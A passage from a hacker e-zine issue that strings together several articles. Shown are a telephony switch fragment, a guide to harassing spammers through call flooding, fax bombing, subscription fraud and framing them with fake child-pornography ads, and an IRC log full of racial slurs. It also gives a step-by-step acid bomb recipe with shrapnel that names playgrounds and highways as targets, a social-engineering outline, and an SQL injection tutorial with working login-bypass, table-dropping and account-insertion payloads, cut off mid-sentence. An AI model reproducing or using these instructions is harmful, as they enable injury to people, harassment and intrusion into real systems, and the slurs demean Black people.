DMS-100/200 or DMS-200 with TOPS.
CCIS6 Diagram:
NSB ST
------------ - - - - - - - - - - -
DTC | | | ------- |
- - - DS30 | IPML | DS30 | - - - | || | |
--------| |------|- - - - - - |------|-| |---| || | |
Digital - - - | | | - - - | || | |
Trunks | | | | || | |
| | | ------- |
| | - - - - - - -|- - - -
DTC | | TM |
DIG - - - DS30 | NUC | DS30 - - - -----
--------| |------|- - - - - - |--------| |----| |
^ - - - |Network | - - - -----
CCIS \ ------------ Modem
Signaling \ |
- - - -----
AN Links--| | | CCC |
- - - -----
Channel
Bank
Acronyms:
DIG - Digital
AN - Analog
DTC - Digital Trunk Controller
MSB - Message Switch Buffer
ST - Signaling Terminal
TM - Trunk Module
NUC - Nailed-Up Connection
IPML - Inter-Peripheral Message Link
Common Channel Signaling (CCS) No. 7 or CCIS7 is a CCS system based on CCITT
No. 7. CCIS7/CCS7 on the DMS switch consists of two parts: the Message
Transfer Part (MTP) and the Interim Telephone user Part. They are compatible
with DMS-100, DMS-200, DMS-100/200, and DMS-100/DMS-100/200 with TOPS.
CCIS7 can't tell the difference between banded and direct signaling. CCIS7
uses Destination/Origination Point Codes (DPC/OPC) to route back to the
switch.
CCIS7 can handle Automatic Calling Card Service (ACCS), Enhanced INWATS, Local
Area Signaling Services, and Direct Service Dialing Capabilities.
A DMS-100 IBN or SL-100 can remotely serve many locations from the host site.
This is done by a connection through digital transmission facilities which are
set up at remote modules at the subscriber's premises.
Here are some diagrams showing the differences between normal private
telecommunications networks and ESN networks.
Normal telecommunications network
----- ------
[Fone]--| SnS | | SL-1 |-[Fone]
| PBX | | PBX |
----- ------
| |DOD/DID DOD/DID| |
| ------- ------- |
|Tie | | Tie|
|Trunk --------- Trunk|
------| Class-5 |------
----| Centrex |----
| --------- |
| |
| |
| |
----- Tie Trunk ---------
| SnS | ----------| Class-5 |
| PBX | | Centrex |
----- ---------
| |
| |
| |
| |
------- ------
[Fone]-| Small | | SL-1 |-[Fone]
| PBX | | |
------- ------
ESN Network
===========
-------- ----------
[Fone]--| Remote | | SL-1 PBX |--[Fone]
| Module | | ESN Main |
-------- ----------
| |
| DS-1 Facility | DS-1 Facility
| -------------- |
--------> | Local Class 5| <---------
[Fone]---------| DMS-100 |
----| IBN/ESN |-------------
2W Loop MFIDP | -------------- | ESN Trunk Group
or DS-1 | | | or DS-1
| ----- ---------------
| | CSC | | Local Class 5 |
-------- ----- | DMS-100 |
| SL-100 | <--- DS-1 ----> | IBN/ESN |
-------- Facility ---------------
| |
| |
| DS-1 Facility | DS-1 Facility
| |
-------- ----------
[Fone]--| Remote | | SL-1 PBX |--[Fone]
| Module | | ESN Main |
-------- ----------
Thanks To All The People That Helped To Contribute Any Info You Have On Dms
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 13 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
=========================================
Some More Ways To Get Revenge On Spammers
=========================================
By: kleptic <kleptic@grex.org>
http://www.kleptic.tk
AIM: kl3ptic
=========================================
Phone call flooding, fax bombing, and magazine subscription harassing
---------------------------------------------------------------------
Unlike dropcode's text in Outbreak #10 about fighting spam. Here are some
"physical ways" to get revenge.
---
Most spam is designed to sell you a product. If the spammer strips out a
return e-mail address, the only way to contact the spammer maybe through
a phone or fax number or an ordinary mailing address.
Because spam usually lists a way to contact the spammer, many people choose
one of two hostile (and illegal) methods of exacting revenge on a spammer.
One is phone call flooding, wherein your computer repeatedly dials the
spammer's phone number, thereby preventing real customers from getting
through. The other is fax bombing, which involves sending multiple faxes
(usually numbering in the hundreds) to jam a spammer's fax machine with
useless messages, giving them a taste of their own spamming. Both ways cost
you money, but the rewards in emotional satisfaction may be worth it.
Here's how you do it:
Just as spammers use bulk e-mailing programs to send mass quantities of e-mail,
you can use war dialers to dial numbers over and over again. You type in the
phone number and how often you want to call it, then the program dials that
number over and over until you tell it to stop. You can do this for voice and
fax phone numbers just as well. (But beware: if you overuse this tactic, your
target can get the police and phone company to trace the calls back to you.
So if you fear Ma Bell, use tactics to keep yourself hidden.)
For a safer but slower way to get your revenge against a spammer, copy down
the spammer's postal address. Then fill out the postage paid subscription
forms that come with every magazine and mail them in. Pretty soon the spammer
will get flooded with magazines and a bill for each one of them. Canceling each
magazine subscription will waste the spammer's time and possibly wreck their
credit rating too, once multiple magazines start reporting the spammer as
delinquent in paying their subscription bills.
For a more automated solution for tracking down a spammer, search for a copy of
SpamShot, Spamicide, or SpamHater. SpamShot lets you filter spam automatically
from your e-mail account so you don't have to bother deleting it yourself.
SpamHater automates the process of retrieving a spammer's real e-mail address and
provides you with polite or nasty letters that you can mail back to them.
Forging a spammer's messages
----------------------------
If a spammer really gets on your nerves, here's a sneaky way to make his or
her life difficult. Open an Internet account (such as AOL) using a credit
card (how you get that CC is your own problem). Send messages to certain
Usenet newsgroups pretending to advertise products or services, using the
spammer's telephone or fax number. Then cancel your account.
For example, visit the social.religion.christian news-groups, leave a message
advertising hardcore child pornography CD-ROM's or devil-worshipping books
for sale to any "interested" parties, and leave the spammer's phone number or
mailing address. You're sure to infuriate news-group members, who will retaliate
by sending the hate mail to the spammer. Of course the spammer won't have any
idea why so many people are suddenly calling or sending hate messages to him.
Spammers are likely to continue haunting the internet, so you might as well have
fun with them at their expense. Wether you decide to use hate mail, phone call
flooding, e-mail bombing, or any other vengeful tactic to retaliate against
spammers, as long as you're happy, who cares how the fucking spammers feel?
==============================================================
Shout Outs: jenny <3, lexi, dropcode, gr3p, rambox, joja,
turbo, timeless, the enigma, radioactive raindeer, everyone on
#outbreakzine on dalnet, and #outbreak on irc.spasm.org.
If I forgot anyone. I'm sorry.
==============================================================
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 14 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
lexi (n0Cixel): lexi@sugarpants.org / http://sugarpants.org
jenny (sugah/heavenly): jennybean@sugarpants.org / http://sugarpants.org/heavenly
Start of #dirtysouth buffer: Sun Sep 29 03:10:26 2002
- Now talking in #dirtysouth
- n0CixeL has joined #dirtysouth
<n0CixeL> awwwwwwwwwwwwwwwwwwwww shit
<shuga> aw haaaail nah
<n0CixeL> nigga word
<shuga> bout to tear some crazay shit up in here, WERD
<n0CixeL> ATL LIKE FUCKING WHAT
<shuga> ATL
<n0CixeL> nig pimpin
<n0CixeL> braiding weeve
<shuga> whatchoo doin?
<shuga> i'm chillin
<n0CixeL> buying weeve online girl
<shuga> tryin to make mah legs look got so ashy
<n0CixeL> weevestore.com
<shuga> gurl they nasty
<n0CixeL> coco buttah girl
<shuga> i got me some of that new coco buttah from sally's
<shuga> mmm girl
<shuga> ya you know
<n0CixeL> aww hell yeah
<n0CixeL> that balm shit
<n0CixeL> mmmhmm
<shuga> shit ya gurl
<shuga> gurl i got me some of that new grease for my hair
<n0CixeL> that jerry curl special shit
<n0CixeL> mmmhmm
<n0CixeL> in the pink box
<shuga> its real good but gurl, it get mah hands all nasty
<n0CixeL> naw girl thats good for your hands girl
<n0CixeL> that oil
<n0CixeL> my skin sucks it right up
<shuga> you know coco buttah helps scars girl?
<n0CixeL> but i leave fingah prints on my car door
<n0CixeL> if they find them
<n0CixeL> i'm going to jail
<n0CixeL> cause you know it be stolen
<n0CixeL> hahah
<shuga> tamika up at Afrikan Braids tole me that yesterday
<n0CixeL> aww hell yeah
<n0CixeL> she a smart girl
<shuga> i saw this white boy
<shuga> walkin up 10th street
<shuga> actin like he some dreadlock rasta
<shuga> girl he was crazy
<n0CixeL> girllll there some weird folk up in the atl
<n0CixeL> you BEST believe
<shuga> gurl i know
<shuga> i be takin mah boo wherever i go
<shuga> you know dis
<n0CixeL> yes girl you best believe
<shuga> i meant to ask you
<n0CixeL> yeah girl what up
<shuga> hows quiefla?
<n0CixeL> girl she fine
<n0CixeL> she got gas
<n0CixeL> but she be ok
<shuga> yo she still roll with that nigga tyrone?
<n0CixeL> that surgery on her head to get that fake weeve really
messed her up
<n0CixeL> all the skress
<n0CixeL> she be having gas
<n0CixeL> yeahhh
<n0CixeL> that nigga tyrone got him an new caddy
<shuga> yeah girl shasima got that shit about foe days ago
<shuga> hell nah girl
<n0CixeL> aww yeah girl
<n0CixeL> it be tight
<n0CixeL> it's an older model like an 80
<shuga> yo you remember that geeky ass nigga jerome?
<n0CixeL> but he's pimpin it
<shuga> guurrrl you dont know
<shuga> he be blingin now
<n0CixeL> aww naw that used to roll with juantiffa?
<shuga> yeah gurl
<n0CixeL> ooo girl hook a nigga up
<shuga> he be pimpin his navigator up and down peachtree street
<n0CixeL> aww hell yeah
<n0CixeL> i needs to hook up with him
<n0CixeL> that nigga is fine
<n0CixeL> cept that gap
<shuga> i wish i would have called him a broken ass nigga when he
asked me to hit up tha movie "friday"
<n0CixeL> in hes teefies
<shuga> you know that movie girl
<shuga> when it was on the big screen
<shuga> wif ice cube
<shuga> that nigga crazy
<n0CixeL> mmhmm
<n0CixeL> he's fly
<n0CixeL> i'd like to sit on his cube
<shuga> how are your nine sistahs girl?
<n0CixeL> HEHEHEH knownsayn?
<shuga> they aight?
<n0CixeL> girlll they good
<shuga> HAHA i feel u gurl
<ajay`> what the fuck is this
<shuga> yo what up?
<ajay`> two guys pretending to be chicks on irc?
<n0CixeL> damn nigga
<n0CixeL> what's up
<n0CixeL> naw we is chicks
<n0CixeL> lol
<n0CixeL> from the ATLLLLLLLLLL
<ajay`> how'd u find this chan
<shuga> where you from, gurl
<shuga> dude iz the dirty souf
<shuga> the dirty souf aint shiet wifout atl
<n0CixeL> hell yeah girl you know
<ajay`> how old are you
<ajay`> shuga
<shuga> but nah girl i got my eye on that nigga jermaine
<shuga> 21 gurl
<n0CixeL> mmm jermaine be fine
<n0CixeL> i heard he's got a big member
<shuga> hell yeah
<n0CixeL> knowmsayn?
<shuga> yeah i heard that too
<n0CixeL> :)
<ajay`> u got a pic?
<shuga> yeah g
<n0CixeL> i got my nails done today
<n0CixeL> they be lookin so good
<ajay`> send it
<shuga> yeah lemme find one
<ajay`> cool
<n0CixeL> mmm ajay so what's up
<n0CixeL> you got a big stick baby?
<ajay`> no
<n0CixeL> why not
<ajay`> ��c��mp3 �[a:� Psychodrama-Greatest_Hits-2000-AUD �-� �s:�
12-psychodrama-crook_county-aud.mp3�]� �[�5m14s\192kbi�t�(��44.1khz��)���]�
<ajay`> hmm
<ajay`> genetics?
<ajay`> maybe just chance
<ajay`> you 21 also?
<shuga> yeah girl this be me
<shuga> hang on
<shuga> http://sugarpants.org/heavenly/shuga.jpg
<n0CixeL> hey girl
<n0CixeL> show him me
<shuga> aight girl one second
<shuga> http://sugarpants.org/heavenly/n0cixel.jpg
<shuga> thats mah gurl nocixel
<ajay`> right
<shuga> damn right girl
<ajay`> heh
<shuga> you know
<shuga> we fly rite
<shuga> ?
<ajay`> nah
<shuga> honey we fly as hail
<shuga> when we ryde up to the club
- n0CixeL has quit IRC (girl i lost my weeve�)
<shuga> yo i'm out like the broke ass niggas one toof
<shuga> one
End of #dirtysouth buffer Sun Sep 29 03:10:26 2002
lexi greets: adeamis, kleptic, dropcode, semi, lenny, blackout, smiley, tiffany, & pickled
cum.
jenny greets: kleptic <3, dropcode, adeamis, gr3p, rambo, tiffany, blackout, lenny, semi,
smiley, pickles.
MUCH LOVE FOE' CHUNKY ASS CHEESE TEEF FROM THE BOF OF US. �� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 15 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
[The construction of an acid bomb]
[by: joja]
[for: outbreak #10 baby, woo!]
Disclaimer: This text is for educational purposes only! If you use this text
as a means to do something destructive, that's your own fault.
I. What you'll need and how to get it.
II. How to "safely" construct your bomb.
III. Different Methods.
IIII. Where to throw this fucker.
I. What you'll need and how to get it.
The muratic acid bomb consists of three main materials:
1. A 2-3 litre plastic bottle(for now).
2. Some aluminum foil.
3. Muratic Acid.
You can play with these and use different methods, which I'll
explain later. The aluminum foil and bottles are the easiest to
obtain. But so is the muratic acid! You can buy muratic acid at
any pool supply store. It usually comes in red one gallon jugs but,
I'm unsure of the price. If they ask any questions just say your dad
said he needed some for the pool, and you weren't sure.
II. How to "safely" construct your bomb.
To construct your acid bomb, first prepare the aluminum foil.
To prepare, take the foil and crumble it into a cylindrical bar,
small enough to fit into the bottle but you want to compress it.
So really there's one thick bar of foil. You can use more than one
alluminum "bar" as we'll call it to make it explode faster.
Next, pour your muratic acid into the plastic bottle to about half
way. Remember to keep the cap! Try not to inhale the fumes because
they ARE toxic, and very unpleasant.The muratic acid is safe in the
plastic bottle for it doesn't react to plastics, it reacts to metal,
like foil :), just keep the cap off.
The final step is the most crucial. Some bombs take a couple minutes,
some take a couple seconds. All you do is put the aluminum bar into
the bottle and cap it fast. Shake it up and throw it somewhere. Make
sure you're a safe distance away from it because the acid does
splatter, and you don't want it in your eyes. Within a few minutes,
your bomb will explode. There's no fire or mushroom clouds, so don't try
and blow up your school with acid bombs. They just make a really loud
boom and have the potential to do a little damage. (Like a mailbox).
III. Different methods.
You can use bigger, or smaller bottles. Even glass bottles or jars
for your bomb. As long as the bottle has a secure cap, it will work
just fine. The one thing that should stay the same is the foil.
Always use foil. Even if you want to make an acid bomb with a mason
jar, some ball bearings, and nails, put the foil in there too.
Shrapnel is always fun, you can use whatever you want, just be sure
to get the fuck out of the way after you insert the foil and cap it.
But If you are using other metals in your bomb, it will explode faster,
so be careful, because that's what the acid reacts to. Metal.
IIII. Where to throw this fucker.
This is the fun part. There are so many places to set off your acid
bomb. Such as a playground during recess, or in someone's car if thier
window is down. It's easiest to get away if you're in a car, just have
the acid in the bottle(un-capped),the foil and the cap ready when you
find your target. Mailboxes, dumpsters, your neighbor's doggy-door.
A public bathroom, even a lake. The possibilities are endless. Just be
creative, be safe, and watch out for pigs. You can even through it into an
intersection, or a main highway. Anything is possible.
Acid bombs are phun, and I hope you have as much fun with them as I
have.
- joja.
I wanted to be cool and have greets in my text this time :D.
Greets go out to: kleptic, rambox, gr3p, turdblow, jenny, lexi,
dropcode, lenny, DirV, failure, clops, drH, Mr. Bubble, Marlboro cigarettes,
Pharmaceuticals, semi, debaser, redbox, rc, Mancow, dewey, Apocal,
hypah, and midget. "and anyone else I forgot."
-- I feel so cool right now.
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 16 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
------------------------------------------------------------------------------------------
Corporate Intrusion: How an attacker gets in
By: Turbanator
------------------------------------------------------------------------------------------
I would first like to start off this text by stating that I in no way endorse
the use of the methods contained in this text file to be used in ANY illegal
activity, this is simply for informational purposes.
-=I. Choosing the victim=-
When a hacker attempts to infiltrate any system, weather it be through social
engineering or through computer means, they most of the time choose their targets
carefully, and for some unknown (at least to the victim) reason. Most hackers,
at least the "leet" ones, wont simply go out and randomly choose some company to
attack just because they don't like their website layout.
-=II. Probing the victim=-
Now that the hacker has chosen his designated target, he can begin to look for
any weaknesses the victim may have. The attacker can find out as much info on any
of the employees in a company as possible, then use that information in a process
known as social engineering. When a hacker is social engineering, he will most
likely speak in a calm monotone voice, and use words with complicated meanings, and
repeat his "given instructions" to give a sense of authority over his victim. Once
the hacker has extracted the information he needs, he then proceeds to use it in the
correct way.
-=III. Probing the corporation=-
Once the hacker has the information he needs, he can then use it accordingly on the
target corporation. Normally the hacker will play around with them for a bit, to see
what the employees are actually like, and get to know their strengths, and more
importantly, their weaknesses. If someone at the front desk, or even in the high level
offices has given out personal information about thing they like, things they hate, etc.
to someone they "know," then they have most likely been a target for an attack at one
time or another. Just because you've talked to Jim in accounting in the 34th cubical on
the 4th floor a couple of times, doesn't mean he is your friend, and a hacker will most
likely pose as Jim, so that he can become your "friend" and get the information he wants
out of you.
-=IV. Testing the information=-
With his newly accuired sensative information, the hacker then proceeds to find a major,
yet unknown weakness in the corporation, and exploit it. So with his new passwords the
hacker looks around the company web site for an "employees only" login prompt. Bingo, its
cleverly hidden at http://www.victimcorp.com/employeelogin.htm. Now he can access some of
the internal networks of the corporation, exposing sensative information, while posing as
Jim from accounting in the 34th cubical on the 4th floor, even though Jim is out sick with
the flu this week...
-=More to come!=-
With me being my lazy self I didnt have enough time to write as much
as I originally wanted to, so look for "Corporate Intrusion: Part 2: Congrats! Your hacked!"
soon.
------------------------------------------------------------------------------------------
This text file was written by:Turbanator
For:Outbreak
The author can be contacted at:turbanator2k2@yahoo.com,
AIM=Turbanator2k2
------------------------------------------------------------------------------------------
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 17 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
######################################################################
###............ SQL Injection: Theory and Practice ............###
######################################################################
Intro.
----------------------------------------------------------------------
Recently, I was hired by an information security firm to code some
backend SQL handlers in ASP. I know what you're thinking, a security
company with an IIS based webserver? This is why I'll keep the name to
myself.
When writing backend applications for a professional web developement
project, its really important to check and double check your code
for potential weaknesses. So, when I was finished writing the
handlers, comparing them to my flowcharts and running them through
a few standard test procedures, I began an indepth security audit.
It was then that I realized the truly hazardous potential weak
ASP/SQL code could have on sensitive information stored in a
database. Understand that this type of attack is by no means anything
new, but after scouring the web for information on this type of vuln-
erability I still believe there is alot of uncharted territory.
NOTE: The vulnerabilities explored in this text are NOT specific to
weak ASP code and are NOT reflective of any weakness of the
SQL language itself. The vulnerabilities can exist in ANY
serverside program interacting with an SQL server ie ASP,
PHP, CGI, etc. All examples presented here deal with
ASP, however, the same vulnerabilities can be exploited on
programs written in other languages using variations of the
same methods.
Basic SQL.
----------------------------------------------------------------------
To start, I'll build a simple, psuedo database. We'll call it
"Access Card Usage LOG":
Table:Log093002
-------------------
.----.---------.---------.---------.---------.---------.
| ID | Date | Time | LName | FName | Door |
|----|---------|---------|---------|---------|---------|
| 12 | 9/30/02 | 6:26 | Smith | Tom | Front |
| 31 | 9/30/02 | 6:26 | Baily | Dick | Front |
| 84 | 9/30/02 | 6:41 | Hoover | Harry | Side |
'----'---------'---------'---------'---------'---------'
Assume the above to be an actual buildings access card useage log. Not
because its important to the file, because... Its cool. Next we'll
discuss the basics of SQL.
For the purpose of this file, SQL is a language used to interact with
databases. The language consists of a set of statements that can be
used together in a logical series to create a query. SQL queries are
used to read data from and manipulate the structure or contents of
databases and is very similar to standard english.
The following is an example of an SQL query to our database.
SELECT ID, LName, Time FROM Log093002
The above could be used to determine whether or not anyone had
arrived late on the date in question (9/30/02). That query would
return the following:
.----.---------.---------.
| 12 | Smith | 6:26 | Scheduled arrival time for 9/30/02
| 31 | Baily | 6:26 | is 6:30. Bad news for mr. Hoover.
| 84 | Hoover | 6:41 | *smirk*
'----'---------'---------'
What if we only wanted to know the arrival time of Harry Hoover? We
can aquire that data using the WHERE clause, we will assume that
the ID field specifies each employees unique Employee Code.
SELECT ID, LName, Time FROM Log093002 WHERE ID = '84'
.----.---------.---------.
| 84 | Hoover | 6:41 |
'----'---------'---------'
The SQL language also makes use of AND, OR, NOT, etc operators along
with a lot of other statements that I've left out here. For more
information on SQL, I suggest reading the tutorials at w3schools.com.
Weaknesses.
----------------------------------------------------------------------
Imagine a database containing a list of names, addresses and phone
numbers similar to the type of database they must be using for 411 and
double-o info type services online (ie switchboard.com). There is a
form on their homepage where a user is able to enter various types of
information that is then run through an asp handler that grabs and
displays matching entries from the database.
Here is a snippit from the database:
.--------------.--------------.-------------------.--------------.
| LastName | FirstName | Address | PNum |
| ... | ... | ... | ... |
| Sanders | Bill | Someplace PA | 612-555-1253 |
| Borsche | Sveda | Nowhere MS | 710-555-1212 |
| ... | ... | ... | ... |
'--------------'--------------'-------------------'--------------'
Here is an example of the form:
<form id="Lookup" method="post" action="Lookup.asp">
<input id="FirstName" type="text" />
<input id="LastName" type="text" />
<input id="Address" type="text" />
<input id="PNum" type="text" />
<input id="Submit" type="submit" value="Submit" />
</form>
You would enter what ever data you have and click submit. The
variables would then be passed to Lookup.asp. This is where the main
weakness lies. Lookup.asp's main function is to generate an SQL query
based on the users input, and use it to grab data from the database.
The following is an example of a weak implementation of this type of
SQL query, here the user entered ONLY the phone number and the omitted
asp code generated the following query:
sqlQuery = "SELECT * FROM 411db WHERE PNum = '" & PNum & "';
If the number entered by the user was 710-555-1212, then the above
variable would translate to this:
SELECT * FROM 411db WHERE PNum = '710-555-1212'
And, after querying the database, would return:
.--------------.--------------.-------------------.--------------.
| Borsche | Sveda | Nowhere MS | 710-555-1212 |
'--------------'--------------'-------------------'--------------'
NOTE: the asterisk (*) between the SELECT and FROM statements is an
SQL wildcard. Just as in Dos, Unix, etc, it means 'all'.
That is the logical process. Its what the developers designed the
system to do, and it does it well. But what happens when we try
something a little less logical? This time, instead of entering a
standard ten digit phonenumber... we'll enter a less standard NO digit
phone number. A standard single quote. Namely: '
In this case, Lookup.asp would generate the following SQL query:
SELECT * FROM 411db WHERE PNum = '''
If Lookup.asp is vulnerable (which, in our case, it is) we would get
a syntax error. In SQL every opening quote requires a closing quote.
The quote we entered in the PNum input box effectively closes the
first quote generated by Lookup.asp, but the last quote (also
generated by Lookup.asp) is left unclosed.
It is possible for us to avoid this error by using an SQL comment
sequence (--). Adding this sequence to an SQL query will cause the
SQL interpreter to ignore anything following the --. so, instead of
entering a single quote into the PNum field, we'll enter a single
quote followed by a comment sequence ('--) generating the following
query:
SELECT * FROM 411db WHERE PNum = ''--'
The SQL interpreter would then remove the comment sequence and
anything following it before processing the request:
SELECT * FROM 411db WHERE PNum = ''
NOTE: the dash dash (--) comment sequence is specific to MS SQL
server. If the dash dash comment sequence doesn't work for
you try a hash (#) as the comment character. If that still
wont work, take a look at the next NOTE for another
possibility. All the examples shown in this text will be
using the -- comment sequence.
Hold on a sec... What did we just do? We got rid of the closing quote
that Lookup.asp was supposed to end the query with, and added our own!
Yay! We've effectively injected completely trivial, useless code
through an html form!
Oh wow. How dangerous. The query we just generated is exactly what
would have been generated had we submitted a completely blank form.
(of course, if we entered a completely blank form, Lookup.asp may have
noticed and complained if it was written with a mechanism to do so).
The truly frightening part is the possiblities that arise when we
begin injecting our own SQL queries.
An important thing to note is that different SQLs use different
delimiting characters. In the following examples we'll use a semicolon
delimiter. Incase you don't know, a delimiter is a character within an
SQL query (and many other languages) that determines where one command
ends and another begins.
Lets add to our single quote double dash ('--) input. This time We'll
place a query between the ' and the -- ie: '; DROP TABLE 411db--
SELECT * FROM 411db WHERE PNum = ''; DROP TABLE 411db --'
Comments removed:
SELECT * FROM 411db WHERE PNum = ''; DROP TABLE 411db
In this query we used the DROP TABLE statement. This particular
SQL command will completely delete a table from a database. Our single
quote acted as a closing quote to lookup.asp's opening quote, followed
by our semicolon (;) effectively ending that first query. DROP TABLE
411db acted as a second query, completely independent of the first,
and finally our -- eliminated Lookup.asp's final closing quote.
In effect, useing '; DROP TABLE 411db-- as our entry caused Lookup.asp
to completely delete the 411db table.
The above example was just a taste of the true potential this exploit
really has. Lets take a look at another database:
Table:userlist
----------------
.-----.------------.------------.
| UID | Username | Password |
|-----|------------|------------|
| 10 | john | love |
| 10 | bill | sex |
| 5 | dan | secret |
| 0 | root | god |
'-----'------------'------------'
Now we're getting somewhere. This database is aslo accessed via a web
form. Lets have a look at that as well:
<form id="auth" method="post" action="auth.asp">
<input id="username" type="text">
<input id="password" type="password">
<input id="submit" type="submit" value="submit">
</form>
And somewhere within auth.asp, a variable is loaded with an SQL query:
sql = "SELECT * FROM userlist WHERE Username = '" & username & "'
AND Password = '" & password & "'"
auth.asp processes the request and the result is tested to see if the
name and password entered match any from the list. Lets take a look at
a translation of a logical interaction:
SELECT * FROM userlist WHERE Username='john' AND Password='love'
This request would return:
.-----.------------.------------.
| 10 | john | love |
'-----'------------'------------'
And auth.asp would go about logging john into the system. Now this is
where the true beauty of this vulnerability shows through. We'll start
by testing auth.asp to see if its vulnerable. If using quote as one of
your inputs generates an SQL syntax error, its generally safe to
assume that the asp is vulnerable. If the developer was smart, he
would have filtered out quotes. So we pass a single quote (') to
auth.asp as the username and the server returns a syntax error. Yay,
weak code.
Now that we know that auth.asp is exploitable, there are any
number of ways we can use the SQL Injection technique to our
advandage. For instance, in the following example I'll inject an OR
operator with a true condition to our SQL query.
Here I'm submitting root as my login and ' OR 0=0-- as my password:
SELECT * FROM userlist WHERE Username = 'root' AND
Password = '' OR 0=0--'
And with the comments removed:
SELECT * FROM userlist WHERE Username = 'root' AND
Password = '' OR 0=0
Originally, auth.asp would ONLY log you in if your Password matched
the stored Password for your Username. But with our injected code,
auth.asp will log you in if your Password matches the stored
Password for your Username OR if 0 is equal to 0, which it always is.
NOTE: As stated in the last NOTE theres a chance that the dash dash
(--) comment sequence wont work. In the case of the above
query theres another possibility. The statement 0=0 has no
function other than to act as a true condition. we could have
just as easily said 1=1 or 9999=9999, so long as the
condition we're stating is true. Knowing this along with the
fact that auth.asp is adding a single quote (') to the end of
our query, we can submit a statement like: ' OR 'x' = 'x
which would generate:
SELECT * FROM userlist WHERE Username = 'root' AND
Password = '' OR 'x' = 'x'
Making use of the quote we couldn't eliminate :) Its also
important to know that not ALL queries have the exact same
syntax, amount of parameters, types of parameters, etc and
that in some circumstances you may have to use a double
quote (") in place of a single quote. Here some variations
to try:
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
It may look daunting, but its quite simple to grasp if you
try. I would suggest trying to understand before you ctrl-c
ctrl-v the crap out of someone.
Maybe we want to build ourselves a root account... We could simply
inject '; INSERT INTO USERS values( 0, Dade, zeroco0l )-- causing the
following query to be submitted:
SELECT * FROM userlist WHERE Username = ''; INSERT INTO USERS
values( 0, Dade, zeroco0l )
There. Two completely independent queries, the latter adding a new
account to the database. Wait a second... I see a problem here. In
order for us to add an account, we would have to know previously that
the table consists of three columns. Additionally, we'd need to know
What data to store in which column.
By default, ASP returns detailed descriptions of all errors. This is
very fortunate because some of the details listed in the errors can
potentially leak information pertaining to the structure of tables
within the target database. We'll make use of the ASP error messages
as an enumeration technique to map out the userlist table.
SELECT * FROM userlist WHERE Username = '' HAVING 0=0
Passing auth.asp the above query (using ' HAVING 0=0-- as our input)
would cause the program to error out and often display the error
report to the user. The reason that query errors out is because of
the way we used the HAVING clause. HAVING is supposed to be used on a
table column thats been called and sorted with the GROUP BY clause.
In our case, no columns were sorted using GROUP BY and because we
use the * wildcard to grab ALL the columns, we'd get an error on
the first column called which is the first column in the table. The
neat thing is that the error report contains the name of the table
AND the name of the column that caused the error :).
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'userlist.UID' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY
clause.
/auth.asp, line 28
From the above error report we have determined that the tables name is
userlist and the first column in the table is called UID. I've already
explained above, but I'll try one more time for anyone who's lost at
this point. 'SELECT * FROM userlist' grabs every column in the table
'userlist' one by one. We use the HAVING clause incorrectly to
purposely generate a syntax error. Because HAVING looks at the column
in question, which in our case is the FIRST column, the error is
generated ON that column and the server bitches, 'hey asshole, I tried
doing what you asked, but the first column isn't sorted and I can't
use HAVING on an unsorted column. I'll just wait here till you sort
the column with GROUP BY.'
Lets take another step. We'll try the same thing, only this time we'll
use the GROUP BY clause to sort the first column. The SQL server will
have no trouble using the HAVING clause on that first, sorted column
but immediately afterwards, it will try using HAVING on the second
column (because we're using *) and since the second column isn't
sorted, we'll error out there.
SELECT * FROM userlist WHERE Username = '' GROUP BY
userlist.UID HAVING 0=0
userlist.UID passes the HAVING test fine, but the second column
causes the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'userlist.Username' is invalid in the select list because
it is not contained in either an aggregate function or the
GROUP BY clause.
/auth.asp, line 28
We can continue this method and eventually map out the entire table.
Once we have the entire table we'll know exactly how to format our
input to add records to the table. For instance, after mapping out
the userlist table, we'd know the columns are UID, Username, Password
and could then add our own login to the table with the correct
criteria. Just to keep you up to pace, heres what the last query of
our mapping procedure would look like:
SELECT * FROM userlist WHERE Username = '' GROUP BY userlist.UID,
userlist.Username, userlist.Password HAVING 0=0
Here, all the columns in the table have been sorted and the query wont
error out. :)
There are other important things that can be gleaned from sql error
messages. Lets take a look at the UNION statement. UNION is used to
merge the results of two separate queries. It is required that both
queries have matching datatypes. For instance:
